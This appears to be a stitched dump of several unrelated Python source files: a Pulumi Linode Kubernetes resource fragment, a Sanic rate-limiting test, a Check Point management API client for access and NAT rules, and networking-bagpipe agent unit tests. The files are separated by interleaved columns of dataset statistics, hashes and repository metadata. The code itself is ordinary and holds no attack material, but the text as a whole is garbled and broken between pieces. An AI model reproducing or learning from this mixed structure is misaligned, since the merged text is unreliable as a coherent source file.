    def api_endpoints(self) -> pulumi.Output[Sequence[str]]:
        """
        The endpoints for the Kubernetes API server.
        """
        return pulumi.get(self, "api_endpoints")

    @property
    @pulumi.getter(name="k8sVersion")
    def k8s_version(self) -> pulumi.Output[str]:
        """
        The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
        """
        return pulumi.get(self, "k8s_version")

    @property
    @pulumi.getter
    def kubeconfig(self) -> pulumi.Output[str]:
        """
        The base64 encoded kubeconfig for the Kubernetes cluster.
        """
        return pulumi.get(self, "kubeconfig")

    @property
    @pulumi.getter
    def label(self) -> pulumi.Output[str]:
        """
        This Kubernetes cluster's unique label.
        """
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def pools(self) -> pulumi.Output[Sequence['outputs.LkeClusterPool']]:
        """
        Additional nested attributes:
        """
        return pulumi.get(self, "pools")

    @property
    @pulumi.getter
    def region(self) -> pulumi.Output[str]:
        """
        This Kubernetes cluster's location.
        """
        return pulumi.get(self, "region")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """
        The status of the node. (`ready`, `not_ready`)
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
        """
        return pulumi.get(self, "tags")
| 40.630252
| 207
| 0.628232
| 2,210
| 19,340
| 5.322624
| 0.085973
| 0.111281
| 0.085692
| 0.06801
| 0.816118
| 0.787469
| 0.740117
| 0.715804
| 0.700247
| 0.673213
| 0
| 0.006209
| 0.258842
| 19,340
| 475
| 208
| 40.715789
| 0.814427
| 0.325129
| 0
| 0.586873
| 1
| 0
| 0.088909
| 0.004719
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158301
| false
| 0.003861
| 0.027027
| 0
| 0.281853
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49446ab7902628873f8b341719a41aef07b6240e
| 82
|
py
|
Python
|
src/chapter22/__init__.py
|
Peefy/CLRS_dugu_code-master
|
98f00e75e1b0ebc13a7affb2604bec8501692a19
|
[
"Apache-2.0"
] | 3
|
2018-01-31T03:08:50.000Z
|
2018-04-25T12:57:01.000Z
|
src/chapter22/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | null | null | null |
src/chapter22/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | 3
|
2019-03-03T04:49:53.000Z
|
2020-07-13T10:18:58.000Z
|
# python src/chapter22/chapter22note.py
# python3 src/chapter22/chapter22note.py
| 20.5
| 40
| 0.817073
| 10
| 82
| 6.7
| 0.6
| 0.358209
| 0.746269
| 0.80597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 0.085366
| 82
| 3
| 41
| 27.333333
| 0.773333
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a226e692f4796cf06d0711714a17ac88f3cc6e
| 933
|
py
|
Python
|
tests/test_simple.py
|
dmarkey/sanic-aiopylimit
|
d5c4e9b5b5a74cc73ba7b3449d3a3396ba9a04a8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple.py
|
dmarkey/sanic-aiopylimit
|
d5c4e9b5b5a74cc73ba7b3449d3a3396ba9a04a8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple.py
|
dmarkey/sanic-aiopylimit
|
d5c4e9b5b5a74cc73ba7b3449d3a3396ba9a04a8
|
[
"Apache-2.0"
] | null | null | null |
from time import sleep
from sample_app.simple import app
def test_throttling_simple_app():
    """Exercise the sample app's rate limits end to end.

    Each endpoint is hit until its limit trips, then '/' is checked to
    recover after the throttle window expires.
    """
    # (path, expected status) pairs, in the exact order the original issued them.
    scripted = [
        ('/write', 200),
        ('/write', 400),
        ('/simpleview', 200),
        ('/simpleview', 429),
        ('/write2', 200),
        ('/write2', 429),
    ]
    for path, expected in scripted:
        request, response = app.test_client.get(path)
        assert response.status == expected

    # '/' allows four requests before throttling kicks in.
    for _ in range(4):
        request, response = app.test_client.get('/')
        assert response.status == 200
    request, response = app.test_client.get('/')
    assert response.status == 429

    # After the window passes, '/' is reachable again.
    sleep(10)
    request, response = app.test_client.get('/')
    assert response.status == 200
| 32.172414
| 58
| 0.679528
| 119
| 933
| 5.218487
| 0.243697
| 0.217391
| 0.26087
| 0.318841
| 0.830918
| 0.830918
| 0.830918
| 0.830918
| 0.830918
| 0.798712
| 0
| 0.043883
| 0.193998
| 933
| 28
| 59
| 33.321429
| 0.781915
| 0
| 0
| 0.73913
| 0
| 0
| 0.05478
| 0
| 0
| 0
| 0
| 0
| 0.391304
| 1
| 0.043478
| false
| 0
| 0.086957
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b8db345b249adf4cab41c0a63c175b446d875acf
| 148
|
py
|
Python
|
text/_cascade/_form/variable.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_form/variable.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_form/variable.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Callable

from .property import Property


# [TODO] inherits from property?
class Variable(Property):
    """A variable form; currently a bare subclass of Property."""
    pass


# NOTE(review): annotation only, no value bound here — presumably a factory
# for Variable instances assigned elsewhere; confirm against callers.
var_: Callable
| 11.384615
| 32
| 0.75
| 18
| 148
| 6.111111
| 0.611111
| 0.218182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 148
| 12
| 33
| 12.333333
| 0.916667
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
77097af46ab0dd7a4568c1a9a537612943f71787
| 17,461
|
py
|
Python
|
cpauto/objects/access.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 16
|
2016-12-07T02:45:31.000Z
|
2022-01-20T11:46:24.000Z
|
cpauto/objects/access.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 2
|
2017-07-20T21:12:27.000Z
|
2021-09-09T14:57:01.000Z
|
cpauto/objects/access.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 5
|
2017-07-28T14:06:25.000Z
|
2021-09-06T12:01:18.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2016 Dana James Traversie and Check Point Software Technologies, Ltd. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# cpauto.objects.access
# ~~~~~~~~~~~~~~~~~~~~~
"""This module contains the classes needed to manage access control and NAT objects."""
from ._common import _CommonClient
class AccessRule:
    """Manage access rules."""

    def __init__(self, core_client):
        self.__cc = core_client
        self.__common_client = _CommonClient(core_client)

    def add(self, layer="", position="", params=None):
        """Adds an access rule within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/add-access-rule

        :param layer: Layer that the rule belongs to identified by name or UID.
        :param position: Position in the rulebase. Can be specified in various ways.
        :type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        # None default avoids the shared mutable-default pitfall of `params={}`.
        params = {} if params is None else params
        return self.__common_client._add_with_layer('add-access-rule', layer, position, params)

    def show(self, layer='', name='', uid='', params=None):
        """Shows details of an access rule within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-rule

        :param layer: Layer that the rule belongs to identified by name or UID.
        :param name: (optional) The name of an existing access rule.
        :param uid: (optional) The unique identifier of an existing access rule.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._post_with_layer('show-access-rule', layer, name, uid, params)

    def set(self, layer='', name='', uid='', params=None):
        """Sets new values for an access rule within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/set-access-rule

        :param layer: Layer that the rule belongs to identified by name or UID.
        :param name: (optional) The name of an existing access rule.
        :param uid: (optional) The unique identifier of an existing access rule.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._post_with_layer('set-access-rule', layer, name, uid, params)

    def delete(self, layer='', name='', uid='', params=None):
        """Deletes an existing access rule within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-access-rule

        :param layer: Layer that the rule belongs to identified by name or UID.
        :param name: (optional) The name of an existing access rule.
        :param uid: (optional) The unique identifier of an existing access rule.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._post_with_layer('delete-access-rule', layer, name, uid, params)

    def show_all(self, name='', params=None):
        """Shows all access rules within a layer, section, etc.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-rulebase

        :param name: The name of an existing access layer, section, etc.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        payload = {'name': name}
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post('show-access-rulebase', payload=payload)
class AccessSection:
    """Manage access sections."""

    def __init__(self, core_client):
        self.__cc = core_client
        self.__common_client = _CommonClient(core_client)

    def add(self, layer="", position="", params=None):
        """Adds an access section within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/add-access-section

        :param layer: Layer that the section belongs to identified by name or UID.
        :param position: Position in the rulebase. Can be specified in various ways.
        :type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        # None default avoids the shared mutable-default pitfall of `params={}`.
        params = {} if params is None else params
        return self.__common_client._add_with_layer('add-access-section', layer, position, params)

    def show(self, layer='', name='', uid='', params=None):
        """Shows details of an access section within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-section

        :param layer: Layer that the section belongs to identified by name or UID.
        :param name: (optional) The name of an existing access section.
        :param uid: (optional) The unique identifier of an existing access section.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._post_with_layer('show-access-section', layer, name, uid, params)

    def set(self, layer='', name='', uid='', params=None):
        """Sets new values for an access section within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/set-access-section

        :param layer: Layer that the section belongs to identified by name or UID.
        :param name: (optional) The name of an existing access section.
        :param uid: (optional) The unique identifier of an existing access section.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._post_with_layer('set-access-section', layer, name, uid, params)

    def delete(self, layer='', name='', uid='', params=None):
        """Deletes an existing access section within a layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-access-section

        :param layer: Layer that the section belongs to identified by name or UID.
        :param name: (optional) The name of an existing access section.
        :param uid: (optional) The unique identifier of an existing access section.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._post_with_layer('delete-access-section', layer, name, uid, params)
class AccessLayer:
    """Manage access layers."""

    def __init__(self, core_client):
        self.__cc = core_client
        self.__common_client = _CommonClient(core_client)

    def add(self, name="", params=None):
        """Adds an access layer.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/add-access-layer

        :param name: A name for the new access layer.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        # None default avoids the shared mutable-default pitfall of `params={}`.
        payload = {'name': name}
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post('add-access-layer', payload=payload)

    def show(self, name='', uid='', details_level=''):
        """Shows details of an access layer with the specified name
        or uid.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-layer

        :param name: (optional) The name of an existing access layer.
        :param uid: (optional) The unique identifier of an existing access layer.
        :param details_level: (optional) The level of detail to show. Default
            value is 'standard' and the other options are: 'uid' or 'full'
        :rtype: CoreClientResult
        """
        return self.__common_client._show('show-access-layer', name=name, uid=uid, details_level=details_level)

    def set(self, name='', uid='', params=None):
        """Sets new values for an existing access layer with the specified
        name or uid.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/set-access-layer

        :param name: (optional) The name of an existing access layer.
        :param uid: (optional) The unique identifier of an existing access layer.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._set('set-access-layer', name=name, uid=uid, params=params)

    def delete(self, name='', uid='', params=None):
        """Deletes an existing access layer with the specified
        name or uid.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-access-layer

        :param name: (optional) The name of an existing access layer.
        :param uid: (optional) The unique identifier of an existing access layer.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        params = {} if params is None else params
        return self.__common_client._delete('delete-access-layer', name=name, uid=uid, params=params)

    def show_all(self, limit=50, offset=0, order=None, details_level=''):
        """Shows all access layers with some reasonable limitations.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-layers

        :param limit: (optional) Limit the total number of access layers shown.
            The default value is 50 and allowed values are in the range 1 to 500.
        :param offset: (optional) Skip a number of access layers in the results
            before they are shown. Default value is 0.
        :param order: (optional) Sort the results by the specified field. The
            default is a random order.
        :param details_level: (optional) The level of detail to show. Default
            value is 'standard' and the other options are: 'uid' or 'full'
        :rtype: CoreClientResult
        """
        # `order=[]` as a default would be shared across calls; normalize here.
        order = [] if order is None else order
        return self.__common_client._show_all('show-access-layers', limit=limit,
                                              offset=offset, order=order, details_level=details_level)
class NATRule:
    """Manage NAT rules."""

    def __init__(self, core_client):
        self.__cc = core_client

    def __post(self, endpoint, package="", uid="", params=None):
        # Shared POST helper: builds the payload from package/uid and merges
        # any extra supported parameters before dispatching.
        payload = {'package': package}
        if uid:
            payload['uid'] = uid
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post(endpoint, payload=payload)

    def add(self, package="", position="", params=None):
        """Adds a NAT rule.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/add-nat-rule

        :param package: Package that the rule belongs to identified by name.
        :param position: Position in the rulebase. Can be specified in various ways.
        :type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        # None default avoids the shared mutable-default pitfall of `params={}`.
        payload = {'package': package, 'position': position}
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post('add-nat-rule', payload=payload)

    def show(self, package="", uid="", params=None):
        """Shows details of a NAT rule within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-nat-rule

        :param package: Package that the rule belongs to identified by name.
        :param uid: (optional) The unique identifier of an existing access rule.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        return self.__post('show-nat-rule', package, uid, params)

    def set(self, package="", uid="", params=None):
        """Sets new values for a NAT rule within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/set-nat-rule

        :param package: Package that the rule belongs to identified by name.
        :param uid: (optional) The unique identifier of an existing access rule.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        return self.__post('set-nat-rule', package, uid, params)

    def delete(self, package="", uid="", params=None):
        """Deletes a NAT rule within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-nat-rule

        :param package: Package that the rule belongs to identified by name.
        :param uid: (optional) The unique identifier of an existing access rule.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        return self.__post('delete-nat-rule', package, uid, params)

    def show_all(self, package="", params=None):
        """Show all NAT rules within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-nat-rulebase

        :param package: The name of an existing package.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        payload = {'package': package}
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post('show-nat-rulebase', payload=payload)
class NATSection:
    """Manage NAT sections."""

    def __init__(self, core_client):
        self.__cc = core_client

    def __post(self, endpoint, package="", name="", uid="", params=None):
        # Shared POST helper: builds the payload from package/name/uid and
        # merges any extra supported parameters before dispatching.
        payload = {'package': package}
        if name:
            payload['name'] = name
        if uid:
            payload['uid'] = uid
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post(endpoint, payload=payload)

    def add(self, package="", position="", params=None):
        """Adds a NAT section.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/add-nat-section

        :param package: Package that the section belongs to identified by name.
        :param position: Position in the rulebase. Can be specified in various ways.
        :type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        # None default avoids the shared mutable-default pitfall of `params={}`.
        payload = {'package': package, 'position': position}
        if params:
            payload = self.__cc.merge_payloads(payload, params)
        return self.__cc.http_post('add-nat-section', payload=payload)

    def show(self, package='', name='', uid='', params=None):
        """Shows details of a NAT section within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/show-nat-section

        :param package: Package that the section belongs to identified by name.
        :param name: (optional) The name of an existing NAT section.
        :param uid: (optional) The unique identifier of an existing NAT section.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        return self.__post('show-nat-section', package, name, uid, params)

    def set(self, package='', name='', uid='', params=None):
        """Sets new values for a NAT section within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/set-nat-section

        :param package: Package that the section belongs to identified by name.
        :param name: (optional) The name of an existing NAT section.
        :param uid: (optional) The unique identifier of an existing NAT section.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        return self.__post('set-nat-section', package, name, uid, params)

    def delete(self, package='', name='', uid='', params=None):
        """Deletes a NAT section within a package.

        https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-nat-section

        :param package: Package that the section belongs to identified by name.
        :param name: (optional) The name of an existing NAT section.
        :param uid: (optional) The unique identifier of an existing NAT section.
        :param params: (optional) A dictionary of additional, supported parameter names and values.
        :rtype: CoreClientResult
        """
        return self.__post('delete-nat-section', package, name, uid, params)
| 45.353247
| 111
| 0.658668
| 2,224
| 17,461
| 5.085432
| 0.090378
| 0.029178
| 0.030769
| 0.042706
| 0.860212
| 0.850752
| 0.818921
| 0.800619
| 0.793634
| 0.786561
| 0
| 0.006844
| 0.230113
| 17,461
| 384
| 112
| 45.471354
| 0.834486
| 0.600137
| 0
| 0.515464
| 0
| 0
| 0.080837
| 0.003789
| 0
| 0
| 0
| 0
| 0
| 1
| 0.309278
| false
| 0
| 0.010309
| 0
| 0.628866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
7730ae110282d00e41fe0c7e37329bcf2135dfde
| 11,750
|
py
|
Python
|
networking_bagpipe/tests/unit/agent/bagpipe_bgp_agent/test_service_bagpipe_l2.py
|
mail2nsrajesh/networking-bagpipe
|
e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2
|
[
"Apache-2.0"
] | null | null | null |
networking_bagpipe/tests/unit/agent/bagpipe_bgp_agent/test_service_bagpipe_l2.py
|
mail2nsrajesh/networking-bagpipe
|
e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2
|
[
"Apache-2.0"
] | null | null | null |
networking_bagpipe/tests/unit/agent/bagpipe_bgp_agent/test_service_bagpipe_l2.py
|
mail2nsrajesh/networking-bagpipe
|
e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 Orange.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from networking_bagpipe.agent import bagpipe_bgp_agent as agent
from networking_bagpipe.tests.unit.agent.bagpipe_bgp_agent import base
class TestServiceBaGPipeL2Mixin(object):
def test_bagpipe_l2_attach_single_port(self):
    # One port attach should produce exactly one EVPN attach call and leave
    # the network registered with a single attachment.
    dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
                                  evpn=base.BAGPIPE_L2_RT1).__dict__

    with mock.patch.object(self.agent,
                           '_send_attach_local_port') as send_attach_fn:
        expected_calls = [
            self._mock_send_expected_call(agent.EVPN,
                                          dummy_port10,
                                          self.DUMMY_VIF10)
        ]

        self.agent.bagpipe_port_attach(None, dummy_port10)

        send_attach_fn.assert_has_calls(expected_calls)

        self._check_network_info(base.NETWORK1['id'],
                                 1,
                                 agent.BAGPIPE_L2_SERVICE,
                                 agent.EVPN,
                                 base.BAGPIPE_L2_RT1)
def test_bagpipe_l2_attach_multiple_ports_same_network(self):
    # Two ports on the same network: one attach call per port, and the
    # network ends up registered with two attachments.
    dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
                                  evpn=base.BAGPIPE_L2_RT1).__dict__
    dummy_port11 = base.DummyPort(base.NETWORK1, base.PORT11,
                                  evpn=base.BAGPIPE_L2_RT1).__dict__

    with mock.patch.object(self.agent,
                           '_send_attach_local_port') as send_attach_fn:
        expected_calls = [
            self._mock_send_expected_call(agent.EVPN,
                                          dummy_port10,
                                          self.DUMMY_VIF10),
            self._mock_send_expected_call(agent.EVPN,
                                          dummy_port11,
                                          self.DUMMY_VIF11)
        ]

        self.agent.bagpipe_port_attach(None, dummy_port10)
        self.agent.bagpipe_port_attach(None, dummy_port11)

        send_attach_fn.assert_has_calls(expected_calls)

        self._check_network_info(base.NETWORK1['id'],
                                 2,
                                 agent.BAGPIPE_L2_SERVICE,
                                 agent.EVPN,
                                 base.BAGPIPE_L2_RT1)
def test_bagpipe_l2_attach_multiple_ports_different_networks(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_port20 = base.DummyPort(base.NETWORK2, base.PORT20,
evpn=base.BAGPIPE_L2_RT2).__dict__
with mock.patch.object(self.agent,
'_send_attach_local_port') as send_attach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port20,
self.DUMMY_VIF20)
]
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port20)
send_attach_fn.assert_has_calls(expected_calls)
for network_id, evpn_rt in [
(base.NETWORK1['id'], base.BAGPIPE_L2_RT1),
(base.NETWORK2['id'], base.BAGPIPE_L2_RT2)]:
self._check_network_info(network_id,
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
evpn_rt)
def test_bagpipe_l2_detach_single_port(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach10 = dict(id=base.PORT10['id'],
network_id=base.NETWORK1['id'])
with mock.patch.object(self.agent,
'_send_detach_local_port') as send_detach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10)
]
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_detach(None, dummy_detach10)
send_detach_fn.assert_has_calls(expected_calls)
self._check_network_info(base.NETWORK1['id'], 0)
self.assertEqual(0, len(self.agent.networks_info),
"Registered attachments list must be empty: %s" %
self.agent.networks_info)
def test_bagpipe_l2_detach_multiple_ports_same_network(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach10 = dict(id=base.PORT10['id'],
network_id=base.NETWORK1['id'])
dummy_port11 = base.DummyPort(base.NETWORK1, base.PORT11,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach11 = dict(id=base.PORT11['id'],
network_id=base.NETWORK1['id'])
with mock.patch.object(self.agent,
'_send_detach_local_port') as send_detach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port11,
self.DUMMY_VIF11)
]
# Attach 2 ports on network 1
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port11)
# Detach 1 port from network 1
self.agent.bagpipe_port_detach(None, dummy_detach10)
# Verify attachments list consistency
self._check_network_info(base.NETWORK1['id'],
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
base.BAGPIPE_L2_RT1)
# Detach remaining port from network 1
self.agent.bagpipe_port_detach(None, dummy_detach11)
# Check if calls on BaGPipe BGP API are as expected
send_detach_fn.assert_has_calls(expected_calls)
# Verify attachments list consistency
self._check_network_info(base.NETWORK1['id'], 0)
self.assertEqual(0, len(self.agent.networks_info),
"Registered attachments list must be empty: %s" %
self.agent.networks_info)
def test_bagpipe_l2_detach_multiple_ports_different_networks(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach10 = dict(id=base.PORT10['id'],
network_id=base.NETWORK1['id'])
dummy_port11 = base.DummyPort(base.NETWORK1, base.PORT11,
evpn=base.BAGPIPE_L2_RT1).__dict__
dummy_detach11 = dict(id=base.PORT11['id'],
network_id=base.NETWORK1['id'])
dummy_port20 = base.DummyPort(base.NETWORK2, base.PORT20,
evpn=base.BAGPIPE_L2_RT2).__dict__
dummy_detach20 = dict(id=base.PORT20['id'],
network_id=base.NETWORK2['id'])
dummy_port21 = base.DummyPort(base.NETWORK2, base.PORT21,
evpn=base.BAGPIPE_L2_RT2).__dict__
dummy_detach21 = dict(id=base.PORT21['id'],
network_id=base.NETWORK2['id'])
with mock.patch.object(self.agent,
'_send_detach_local_port') as send_detach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10),
self._mock_send_expected_call(agent.EVPN,
dummy_port20,
self.DUMMY_VIF20),
self._mock_send_expected_call(agent.EVPN,
dummy_port11,
self.DUMMY_VIF11),
self._mock_send_expected_call(agent.EVPN,
dummy_port21,
self.DUMMY_VIF21)
]
# Attach 2 ports on network 1
self.agent.bagpipe_port_attach(None, dummy_port10)
self.agent.bagpipe_port_attach(None, dummy_port11)
# Attach 2 ports on network 2
self.agent.bagpipe_port_attach(None, dummy_port20)
self.agent.bagpipe_port_attach(None, dummy_port21)
# Detach 1 port from each network
self.agent.bagpipe_port_detach(None, dummy_detach10)
self.agent.bagpipe_port_detach(None, dummy_detach20)
# Verify attachments list consistency
for network_id, evpn_rt in [
(base.NETWORK1['id'], base.BAGPIPE_L2_RT1),
(base.NETWORK2['id'], base.BAGPIPE_L2_RT2)]:
self._check_network_info(network_id,
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
evpn_rt)
